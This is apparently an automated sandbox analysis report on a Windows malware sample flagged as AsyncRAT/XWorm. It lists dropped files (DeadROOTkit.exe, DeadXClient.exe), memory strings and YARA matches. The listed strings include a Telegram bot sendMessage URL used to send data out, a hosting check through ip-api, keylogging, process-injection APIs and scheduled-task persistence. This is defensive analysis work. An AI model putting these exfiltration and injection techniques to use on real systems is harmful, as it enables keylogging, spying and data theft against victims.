Source: lsass.exe, 0000000C.00000000.1774122233.00000202C0390000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 0000000C.00000000.1774122233.00000202C03B3000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 0000000C.00000002.2969201803.00000202C0390000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 0000000C.00000003.2189100927.00000202C0351000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 0000000C.00000002.2969201803.00000202C03B3000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 0000000C.00000003.1786428389.00000202C037F000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 0000000C.00000002.2967895483.00000202C0379000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 0000000C.00000000.1766962440.00000202C037F000.00000004.00000001.00020000.00000000.sdmp String found in binary or memory: http://crl4.digicert.com/DigicertSHA2SecureServerCA-1.crl0
Source: lsass.exe, 0000000C.00000000.1763590382.00000202BFC89000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 0000000C.00000002.2952382254.00000202BFC89000.00000004.00000001.00020000.00000000.sdmp String found in binary or memory: http://ctldl.windowsupdate.com/msdownload/update/v3/static/trustedr/en
Source: lsass.exe, 0000000C.00000002.2957284217.00000202C0200000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 0000000C.00000000.1763730672.00000202C0200000.00000004.00000001.00020000.00000000.sdmp String found in binary or memory: http://ctldl.windowsupdate.com/msdownload/update/v3/static/trustedr/en/authrootstl.cab
Source: lsass.exe, 0000000C.00000000.1763228169.00000202BFC2F000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 0000000C.00000002.2948416778.00000202BFC2F000.00000004.00000001.00020000.00000000.sdmp String found in binary or memory: http://docs.oasis-open.org/ws-sx/ws-securitypolicy/200702
Source: lsass.exe, 0000000C.00000002.2949177193.00000202BFC4E000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 0000000C.00000000.1763357769.00000202BFC4E000.00000004.00000001.00020000.00000000.sdmp String found in binary or memory: http://docs.oasis-open.org/ws-sx/ws-trust/200512
Source: lsass.exe, 0000000C.00000000.1763228169.00000202BFC2F000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 0000000C.00000002.2948416778.00000202BFC2F000.00000004.00000001.00020000.00000000.sdmp String found in binary or memory: http://docs.oasis-open.org/wss/2004/01/oasis-200401-wss-wssecurity-utility-1.0.xsd
Source: DeadROOTkit.exe, 00000002.00000002.2956134718.0000000002311000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://ip-api.com
Source: mIURiU8n2P.exe, 00000000.00000002.1703934967.00000000027B1000.00000004.00000800.00020000.00000000.sdmp, DeadROOTkit.exe, 00000002.00000002.2956134718.0000000002311000.00000004.00000800.00020000.00000000.sdmp, DeadROOTkit.exe, 00000002.00000000.1701692705.00000000001A2000.00000002.00000001.01000000.00000008.sdmp, DeadROOTkit.exe.2.dr String found in binary or memory: http://ip-api.com/line/?fields=hosting
Source: powershell.exe, 00000004.00000002.1899586399.0000011113902000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.1899586399.0000011113AA5000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000007.00000002.1839365843.000002DE90074000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000001D.00000002.2052291589.000001F091483000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://nuget.org/NuGet.exe
Source: lsass.exe, 0000000C.00000000.1774122233.00000202C0390000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 0000000C.00000000.1774122233.00000202C03B3000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 0000000C.00000000.1763590382.00000202BFC89000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 0000000C.00000002.2952382254.00000202BFC89000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 0000000C.00000002.2969201803.00000202C0390000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 0000000C.00000002.2974624894.00000202C0400000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 0000000C.00000003.2189100927.00000202C0351000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 0000000C.00000002.2969201803.00000202C03B3000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 0000000C.00000003.1786428389.00000202C037F000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 0000000C.00000000.1766962440.00000202C037F000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 0000000C.00000000.1774441153.00000202C0402000.00000004.00000001.00020000.00000000.sdmp String found in binary or memory: http://ocsp.digicert.com0
Source: lsass.exe, 0000000C.00000000.1774122233.00000202C0390000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 0000000C.00000000.1774915423.00000202C043D000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 0000000C.00000002.2969201803.00000202C0390000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 0000000C.00000000.1763730672.00000202C024B000.00000004.00000001.00020000.00000000.sdmp String found in binary or memory: http://ocsp.digicert.com0:
Source: lsass.exe, 0000000C.00000000.1774122233.00000202C0390000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 0000000C.00000000.1774122233.00000202C03B3000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 0000000C.00000002.2969201803.00000202C0390000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 0000000C.00000003.2189100927.00000202C0351000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 0000000C.00000002.2969201803.00000202C03B3000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 0000000C.00000003.1786428389.00000202C037F000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 0000000C.00000002.2967895483.00000202C0379000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 0000000C.00000000.1766962440.00000202C037F000.00000004.00000001.00020000.00000000.sdmp String found in binary or memory: http://ocsp.digicert.com0H
Source: lsass.exe, 0000000C.00000002.2974624894.00000202C0400000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 0000000C.00000000.1774441153.00000202C0402000.00000004.00000001.00020000.00000000.sdmp String found in binary or memory: http://ocsp.digicert.com0I
Source: lsass.exe, 0000000C.00000000.1774122233.00000202C0390000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 0000000C.00000002.2969201803.00000202C0390000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 0000000C.00000003.2189100927.00000202C0351000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 0000000C.00000000.1763730672.00000202C024B000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 0000000C.00000003.1786428389.00000202C037F000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 0000000C.00000000.1766962440.00000202C037F000.00000004.00000001.00020000.00000000.sdmp String found in binary or memory: http://ocsp.msocsp.com0
Source: powershell.exe, 0000001D.00000002.1922708453.000001F081639000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://pesterbdd.com/images/Pester.png
Source: svchost.exe, 0000001A.00000002.2962138490.00000241A96E0000.00000002.00000001.00040000.00000000.sdmp String found in binary or memory: http://schemas.micro
Source: svchost.exe, 00000016.00000002.3001209327.000001845BB84000.00000004.00000001.00020000.00000000.sdmp String found in binary or memory: http://schemas.msoftP
Source: powershell.exe, 00000007.00000002.1786234964.000002DE80229000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000001D.00000002.1922708453.000001F081639000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://schemas.xmlsoap.org/soap/encoding/
Source: lsass.exe, 0000000C.00000000.1763228169.00000202BFC2F000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 0000000C.00000002.2948416778.00000202BFC2F000.00000004.00000001.00020000.00000000.sdmp String found in binary or memory: http://schemas.xmlsoap.org/ws/2004/09/policy
Source: lsass.exe, 0000000C.00000000.1763228169.00000202BFC2F000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 0000000C.00000002.2948416778.00000202BFC2F000.00000004.00000001.00020000.00000000.sdmp String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/trust
Source: DeadXClient.exe, 00000001.00000002.2955878706.0000000002901000.00000004.00000800.00020000.00000000.sdmp, DeadROOTkit.exe, 00000002.00000002.2956134718.0000000002311000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.1779642673.0000011103891000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000007.00000002.1786234964.000002DE80001000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000001D.00000002.1922708453.000001F081411000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
Source: lsass.exe, 0000000C.00000002.2949177193.00000202BFC4E000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 0000000C.00000000.1763357769.00000202BFC4E000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 0000000C.00000000.1763228169.00000202BFC2F000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 0000000C.00000002.2948416778.00000202BFC2F000.00000004.00000001.00020000.00000000.sdmp String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/07/securitypolicy
Source: powershell.exe, 00000007.00000002.1786234964.000002DE80229000.00000004.00000800.00020000.00000000.sdmp, lsass.exe, 0000000C.00000000.1763228169.00000202BFC2F000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 0000000C.00000002.2948416778.00000202BFC2F000.00000004.00000001.00020000.00000000.sdmp, powershell.exe, 0000001D.00000002.1922708453.000001F081639000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://schemas.xmlsoap.org/wsdl/
Source: lsass.exe, 0000000C.00000000.1763228169.00000202BFC2F000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 0000000C.00000002.2948416778.00000202BFC2F000.00000004.00000001.00020000.00000000.sdmp String found in binary or memory: http://schemas.xmlsoap.org/wsdl/erties
Source: lsass.exe, 0000000C.00000000.1763228169.00000202BFC2F000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 0000000C.00000002.2948416778.00000202BFC2F000.00000004.00000001.00020000.00000000.sdmp String found in binary or memory: http://schemas.xmlsoap.org/wsdl/soap12/
Source: powershell.exe, 0000001D.00000002.1922708453.000001F081639000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0.html
Source: lsass.exe, 0000000C.00000002.2974624894.00000202C0400000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 0000000C.00000000.1774441153.00000202C0402000.00000004.00000001.00020000.00000000.sdmp String found in binary or memory: http://www.digicert.com/CPS0
Source: lsass.exe, 0000000C.00000000.1774122233.00000202C0390000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 0000000C.00000000.1774122233.00000202C03B3000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 0000000C.00000002.2969201803.00000202C0390000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 0000000C.00000003.2189100927.00000202C0351000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 0000000C.00000002.2969201803.00000202C03B3000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 0000000C.00000003.1786428389.00000202C037F000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 0000000C.00000002.2967895483.00000202C0379000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 0000000C.00000000.1766962440.00000202C037F000.00000004.00000001.00020000.00000000.sdmp String found in binary or memory: http://www.digicert.com/CPS0~
Source: svchost.exe, 00000028.00000002.3011157363.000001AABFC8F000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 00000028.00000000.1926814755.000001AABFC8F000.00000004.00000001.00020000.00000000.sdmp String found in binary or memory: http://www.msftconnecttest.com
Source: svchost.exe, 00000028.00000002.3011157363.000001AABFC8F000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 00000028.00000000.1926814755.000001AABFC8F000.00000004.00000001.00020000.00000000.sdmp String found in binary or memory: http://www.msftconnecttest.com/
Source: powershell.exe, 00000004.00000002.1779642673.0000011103891000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000007.00000002.1786234964.000002DE80001000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000001D.00000002.1922708453.000001F081411000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://aka.ms/pscore68
Source: DeadROOTkit.exe, 00000002.00000002.2956134718.000000000235B000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://api.telegram.org
Source: mIURiU8n2P.exe, 00000000.00000002.1703934967.00000000027B1000.00000004.00000800.00020000.00000000.sdmp, DeadROOTkit.exe, 00000002.00000002.2956134718.000000000235B000.00000004.00000800.00020000.00000000.sdmp, DeadROOTkit.exe, 00000002.00000000.1701692705.00000000001A2000.00000002.00000001.01000000.00000008.sdmp, DeadROOTkit.exe.2.dr String found in binary or memory: https://api.telegram.org/bot
Source: DeadROOTkit.exe, 00000002.00000002.2956134718.000000000235B000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://api.telegram.org/botYour_Token/sendMessage?chat_id=Your_ID&text=
Source: DeadROOTkit.exe, 00000002.00000002.2956134718.000000000235B000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://api.telegram.org/botYour_Token/sendMessage?chat_id=Your_ID&text=%E2%98%A0%20%5BXWorm%20V3.0%
Source: powershell.exe, 0000001D.00000002.2052291589.000001F091483000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://contoso.com/
Source: powershell.exe, 0000001D.00000002.2052291589.000001F091483000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://contoso.com/Icon
Source: powershell.exe, 0000001D.00000002.2052291589.000001F091483000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://contoso.com/License
Source: powershell.exe, 0000001D.00000002.1922708453.000001F081639000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://github.com/Pester/Pester
Source: powershell.exe, 00000004.00000002.1779642673.0000011104DE4000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://go.micro
Source: powershell.exe, 00000004.00000002.1899586399.0000011113902000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000007.00000002.1839365843.000002DE90074000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000001D.00000002.2052291589.000001F091483000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://nuget.org/nuget.exe
Source: Microsoft-Windows-PushNotification-Platform%4Operational.evtx.25.dr String found in binary or memory: https://wns2-by3p.notify.windows.com/?token=AwYAAACklixT6U5TxXWj7Y4oTt3JqNuZjYaQtFRvg3Ifna8Pnwup50yq
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49739
Source: unknown Network traffic detected: HTTP traffic on port 49739 -> 443
Source: unknown HTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.4:49739 version: TLS 1.2

Key, Mouse, Clipboard, Microphone and Screen Capturing

Source: DeadROOTkit.exe.0.dr, XLogger.cs .Net Code: KeyboardLayout
Source: 0.2.mIURiU8n2P.exe.27c5330.2.raw.unpack, XLogger.cs .Net Code: KeyboardLayout
Source: DeadROOTkit.exe.2.dr, XLogger.cs .Net Code: KeyboardLayout
Source: C:\Users\Public\DeadROOTkit.exe Window created: window name: CLIPBRDWNDCLASS

Operating System Destruction

Source: C:\Users\Public\DeadROOTkit.exe Process information set: 01 00 00 00

System Summary

Source: 2.0.DeadROOTkit.exe.1a0000.0.unpack, type: UNPACKEDPE Matched rule: Detects AsyncRAT Author: ditekSHen
Source: 0.2.mIURiU8n2P.exe.27c5330.2.unpack, type: UNPACKEDPE Matched rule: Detects AsyncRAT Author: ditekSHen
Source: 0.2.mIURiU8n2P.exe.27c5330.2.raw.unpack, type: UNPACKEDPE Matched rule: Detects AsyncRAT Author: ditekSHen
Source: 1.0.DeadXClient.exe.680000.0.unpack, type: UNPACKEDPE Matched rule: Detects AsyncRAT Author: ditekSHen
Source: 00000001.00000000.1700076185.0000000000682000.00000002.00000001.01000000.00000007.sdmp, type: MEMORY Matched rule: Detects AsyncRAT Author: ditekSHen
Source: 00000000.00000002.1703934967.0000000002781000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY Matched rule: Detects AsyncRAT Author: ditekSHen
Source: 00000000.00000002.1703934967.00000000027B1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY Matched rule: Detects AsyncRAT Author: ditekSHen
Source: 00000002.00000000.1701692705.00000000001A2000.00000002.00000001.01000000.00000008.sdmp, type: MEMORY Matched rule: Detects AsyncRAT Author: ditekSHen
Source: C:\Users\Public\DeadXClient.exe, type: DROPPED Matched rule: Detects AsyncRAT Author: ditekSHen
Source: C:\Users\user\AppData\Local\DeadROOTkit.exe, type: DROPPED Matched rule: Detects AsyncRAT Author: ditekSHen
Source: C:\Users\Public\Deadsvchost.exe, type: DROPPED Matched rule: Detects AsyncRAT Author: ditekSHen
Source: C:\Users\Public\DeadROOTkit.exe, type: DROPPED Matched rule: Detects AsyncRAT Author: ditekSHen
Source: mIURiU8n2P.exe, -Program-.cs Long String: Length: 253952
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Code function: 4_2_00007FFD9B7F0C4D NtWriteVirtualMemory, 4_2_00007FFD9B7F0C4D
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Code function: 4_2_00007FFD9B7F0FD4 NtResumeThread, 4_2_00007FFD9B7F0FD4
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Code function: 4_2_00007FFD9B7F0F10 NtSetContextThread, 4_2_00007FFD9B7F0F10
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Code function: 4_2_00007FFD9B7F0A2E NtUnmapViewOfSection, 4_2_00007FFD9B7F0A2E
Source: C:\Windows\System32\dllhost.exe Code function: 6_2_0000000140001854 OpenProcess,IsWow64Process,CloseHandle,OpenProcess,OpenProcess,K32GetModuleFileNameExW,PathFindFileNameW,lstrlenW,StrCpyW,CloseHandle,StrCmpIW,NtQueryInformationProcess,OpenProcessToken,GetTokenInformation,GetLastError,LocalAlloc,GetTokenInformation,GetSidSubAuthorityCount,GetSidSubAuthority,LocalFree,CloseHandle,StrStrA,VirtualAllocEx,WriteProcessMemory,NtCreateThreadEx,WaitForSingleObject,GetExitCodeThread,VirtualFreeEx,CloseHandle,CloseHandle, 6_2_0000000140001854
Source: C:\Windows\System32\winlogon.exe Code function: 11_2_00000225DC6429B0 NtEnumerateValueKey,NtEnumerateValueKey, 11_2_00000225DC6429B0
Source: C:\Windows\System32\lsass.exe Code function: 12_2_00000202C0AE2618 NtQueryDirectoryFileEx,GetFileType,StrCpyW, 12_2_00000202C0AE2618
Source: C:\Windows\System32\lsass.exe Code function: 12_2_00000202C0AE2118 NtQuerySystemInformation,StrCmpNIW, 12_2_00000202C0AE2118
Source: C:\Windows\System32\dwm.exe Code function: 16_2_000002BAAF2129B0 NtEnumerateValueKey,NtEnumerateValueKey, 16_2_000002BAAF2129B0
Source: C:\Windows\System32\svchost.exe File created: C:\Windows\System32\Tasks\DeadROOTkit
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File deleted: C:\Windows\Temp\__PSScriptPolicyTest_qnblsrzc.xue.ps1
Source: C:\Users\user\Desktop\mIURiU8n2P.exe Code function: 0_2_00007FFD9B800C11 0_2_00007FFD9B800C11
Source: C:\Users\Public\DeadXClient.exe Code function: 1_2_00007FFD9B7F6F66 1_2_00007FFD9B7F6F66
Source: C:\Users\Public\DeadXClient.exe Code function: 1_2_00007FFD9B7F7D12 1_2_00007FFD9B7F7D12
Source: C:\Users\Public\DeadXClient.exe Code function: 1_2_00007FFD9B7F0E79 1_2_00007FFD9B7F0E79
Source: C:\Users\Public\DeadXClient.exe Code function: 1_2_00007FFD9B7F1799 1_2_00007FFD9B7F1799
Source: C:\Users\Public\DeadROOTkit.exe Code function: 2_2_00007FFD9B8012E9 2_2_00007FFD9B8012E9
Source: C:\Users\Public\DeadROOTkit.exe Code function: 2_2_00007FFD9B805F06 2_2_00007FFD9B805F06
Source: C:\Users\Public\DeadROOTkit.exe Code function: 2_2_00007FFD9B8021D1 2_2_00007FFD9B8021D1
Source: C:\Users\Public\DeadROOTkit.exe Code function: 2_2_00007FFD9B806CB2 2_2_00007FFD9B806CB2
Source: C:\Users\Public\DeadROOTkit.exe Code function: 2_2_00007FFD9B8046DD 2_2_00007FFD9B8046DD
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Code function: 4_2_00007FFD9B7EF649 4_2_00007FFD9B7EF649
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Code function: 4_2_00007FFD9B7EB2FA 4_2_00007FFD9B7EB2FA
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Code function: 4_2_00007FFD9B7EE319 4_2_00007FFD9B7EE319
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Code function: 4_2_00007FFD9B7EFDD9 4_2_00007FFD9B7EFDD9
Source: C:\Windows\System32\dllhost.exe Code function: 6_3_000002E86A06F418 6_3_000002E86A06F418
Source: C:\Windows\System32\dllhost.exe Code function: 6_3_000002E86A06B150 6_3_000002E86A06B150
Source: C:\Windows\System32\dllhost.exe Code function: 6_3_000002E86A06B35C 6_3_000002E86A06B35C
Source: C:\Windows\System32\dllhost.exe Code function: 6_3_000002E86A071778 6_3_000002E86A071778
Source: C:\Windows\System32\svchost.exe Code function: String function: 000002A6612E2770 appears 36 times
Source: C:\Windows\System32\svchost.exe Code function: String function: 0000026A879A2770 appears 36 times
Source: C:\Windows\System32\svchost.exe Code function: String function: 0000017953782770 appears 36 times
Source: C:\Windows\System32\svchost.exe Code function: String function: 000002295D542770 appears 36 times
Source: C:\Windows\System32\winlogon.exe Code function: String function: 00000225DC622770 appears 36 times
Source: C:\Windows\System32\lsass.exe Code function: String function: 00000202C0AC2770 appears 36 times
Source: C:\Windows\System32\dllhost.exe Code function: String function: 000002E86A072770 appears 36 times
Source: C:\Windows\System32\dwm.exe Code function: String function: 000002BAAF1F2770 appears 36 times
Source: DeadCodeRootKit.exe.0.dr Static PE information: Resource name: EXE type: PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
Source: mIURiU8n2P.exe, 00000000.00000002.1704251593.000000001B256000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: OriginalFilenameDeadXClient.exe4 vs mIURiU8n2P.exe
Source: mIURiU8n2P.exe, 00000000.00000002.1703934967.0000000002781000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: OriginalFilenameDeadXClient.exe4 vs mIURiU8n2P.exe
Source: mIURiU8n2P.exe, 00000000.00000002.1703998113.0000000012788000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: OriginalFilenameDealarOrDeadCode.exe4 vs mIURiU8n2P.exe
Source: mIURiU8n2P.exe, 00000000.00000002.1703934967.00000000027B1000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: OriginalFilenameDeadROOTkit.exe4 vs mIURiU8n2P.exe
Source: mIURiU8n2P.exe, 00000000.00000000.1663022110.00000000003F0000.00000002.00000001.01000000.00000003.sdmp Binary or memory string: OriginalFilenameM6JR1IT3F6.exe4 vs mIURiU8n2P.exe
Source: mIURiU8n2P.exe Binary or memory string: OriginalFilenameM6JR1IT3F6.exe4 vs mIURiU8n2P.exe
Source: mIURiU8n2P.exe Static PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
Source: unknown Process created: Commandline size = 5531
Source: 2.0.DeadROOTkit.exe.1a0000.0.unpack, type: UNPACKEDPE Matched rule: MALWARE_Win_AsyncRAT author = ditekSHen, description = Detects AsyncRAT
Source: 0.2.mIURiU8n2P.exe.27c5330.2.unpack, type: UNPACKEDPE Matched rule: MALWARE_Win_AsyncRAT author = ditekSHen, description = Detects AsyncRAT
Source: 0.2.mIURiU8n2P.exe.27c5330.2.raw.unpack, type: UNPACKEDPE Matched rule: MALWARE_Win_AsyncRAT author = ditekSHen, description = Detects AsyncRAT
Source: 1.0.DeadXClient.exe.680000.0.unpack, type: UNPACKEDPE Matched rule: MALWARE_Win_AsyncRAT author = ditekSHen, description = Detects AsyncRAT
Source: 00000001.00000000.1700076185.0000000000682000.00000002.00000001.01000000.00000007.sdmp, type: MEMORY Matched rule: MALWARE_Win_AsyncRAT author = ditekSHen, description = Detects AsyncRAT
Source: 00000000.00000002.1703934967.0000000002781000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY Matched rule: MALWARE_Win_AsyncRAT author = ditekSHen, description = Detects AsyncRAT
Source: 00000000.00000002.1703934967.00000000027B1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY Matched rule: MALWARE_Win_AsyncRAT author = ditekSHen, description = Detects AsyncRAT
Source: 00000002.00000000.1701692705.00000000001A2000.00000002.00000001.01000000.00000008.sdmp, type: MEMORY Matched rule: MALWARE_Win_AsyncRAT author = ditekSHen, description = Detects AsyncRAT
Source: C:\Users\Public\DeadXClient.exe, type: DROPPED Matched rule: MALWARE_Win_AsyncRAT author = ditekSHen, description = Detects AsyncRAT
Source: C:\Users\user\AppData\Local\DeadROOTkit.exe, type: DROPPED Matched rule: MALWARE_Win_AsyncRAT author = ditekSHen, description = Detects AsyncRAT
Source: C:\Users\Public\Deadsvchost.exe, type: DROPPED Matched rule: MALWARE_Win_AsyncRAT author = ditekSHen, description = Detects AsyncRAT
Source: C:\Users\Public\DeadROOTkit.exe, type: DROPPED Matched rule: MALWARE_Win_AsyncRAT author = ditekSHen, description = Detects AsyncRAT
Source: DeadXClient.exe.0.dr, Helper.cs Cryptographic APIs: 'TransformFinalBlock'
Source: DeadXClient.exe.0.dr, Helper.cs Cryptographic APIs: 'TransformFinalBlock'
Source: DeadXClient.exe.0.dr, AlgorithmAES.cs Cryptographic APIs: 'TransformFinalBlock'
Source: DeadROOTkit.exe.0.dr, Helper.cs Cryptographic APIs: 'TransformFinalBlock'
Source: DeadROOTkit.exe.0.dr, Helper.cs Cryptographic APIs: 'TransformFinalBlock'
Source: DeadROOTkit.exe.0.dr, AlgorithmAES.cs Cryptographic APIs: 'TransformFinalBlock'
Source: 0.2.mIURiU8n2P.exe.27c5330.2.raw.unpack, Helper.cs Cryptographic APIs: 'TransformFinalBlock'
Source: 0.2.mIURiU8n2P.exe.27c5330.2.raw.unpack, Helper.cs Cryptographic APIs: 'TransformFinalBlock'
Source: 0.2.mIURiU8n2P.exe.27c5330.2.raw.unpack, AlgorithmAES.cs Cryptographic APIs: 'TransformFinalBlock'
Source: Deadsvchost.exe.1.dr, Helper.cs Cryptographic APIs: 'TransformFinalBlock'
Source: Deadsvchost.exe.1.dr, Helper.cs Cryptographic APIs: 'TransformFinalBlock'
Source: 0.2.mIURiU8n2P.exe.27c5330.2.raw.unpack, ClientSocket.cs Security API names: System.Security.Principal.WindowsPrincipal.IsInRole(System.Security.Principal.WindowsBuiltInRole)
Source: 0.2.mIURiU8n2P.exe.27c5330.2.raw.unpack, ClientSocket.cs Security API names: System.Security.Principal.WindowsIdentity.GetCurrent()
Source: DeadROOTkit.exe.0.dr, ClientSocket.cs Security API names: System.Security.Principal.WindowsPrincipal.IsInRole(System.Security.Principal.WindowsBuiltInRole)
Source: DeadROOTkit.exe.0.dr, ClientSocket.cs Security API names: System.Security.Principal.WindowsIdentity.GetCurrent()
Source: Deadsvchost.exe.1.dr, ClientSocket.cs Security API names: System.Security.Principal.WindowsPrincipal.IsInRole(System.Security.Principal.WindowsBuiltInRole)
Source: Deadsvchost.exe.1.dr, ClientSocket.cs Security API names: System.Security.Principal.WindowsIdentity.GetCurrent()
Source: DeadXClient.exe.0.dr, ClientSocket.cs Security API names: System.Security.Principal.WindowsPrincipal.IsInRole(System.Security.Principal.WindowsBuiltInRole)
Source: DeadXClient.exe.0.dr, ClientSocket.cs Security API names: System.Security.Principal.WindowsIdentity.GetCurrent()
Source: DeadROOTkit.exe.2.dr, ClientSocket.cs Security API names: System.Security.Principal.WindowsPrincipal.IsInRole(System.Security.Principal.WindowsBuiltInRole)
Source: DeadROOTkit.exe.2.dr, ClientSocket.cs Security API names: System.Security.Principal.WindowsIdentity.GetCurrent()
Source: Microsoft-Windows-SMBServer%4Operational.evtx.25.dr Binary string: user-PC WORKGROUP:\Device\NetBT_Tcpip_{E3B92EAA-F5C7-47F8-A487-F466F42035A1}
Source: Security.evtx.25.dr Binary string: \Device\HarddiskVolume3\Windows\System32\drivers\filetrace.sys\Ke
Source: Microsoft-Windows-CodeIntegrity%4Operational.evtx.25.dr Binary string: >\Device\HarddiskVolume3\Windows\System32\drivers\filetrace.sys
Source: System.evtx.25.dr Binary string: \Device\HarddiskVolume3\Windows\SysWOW64\tzutil.exe`
Source: Microsoft-Windows-SMBServer%4Operational.evtx.25.dr Binary string: \Device\NetbiosSmb
Source: Microsoft-Windows-CodeIntegrity%4Operational.evtx.25.dr Binary string: J\Device\HarddiskVolume3\Program Files (x86)\Joebox\driver\joeboxdriver.sys
Source: System.evtx.25.dr Binary string: \\?\Volume{5d0fa9fb-e2e8-4263-a849-b22baad6d1d8}\Device\HarddiskVolume4
Source: Microsoft-Windows-Security-Mitigations%4KernelMode.evtx.25.dr Binary string: T\Device\HarddiskVolume3\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe
Source: System.evtx.25.dr Binary string: C:\Device\HarddiskVolume3`
Source: Security.evtx.25.dr Binary string: \Device\HarddiskVolume3\Program Files (x86)\Joebox\driver\joeboxdriver.sys
Source: Microsoft-Windows-Security-Mitigations%4KernelMode.evtx.25.dr Binary string: A\Device\HarddiskVolume3\Program Files\Mozilla Firefox\firefox.exe
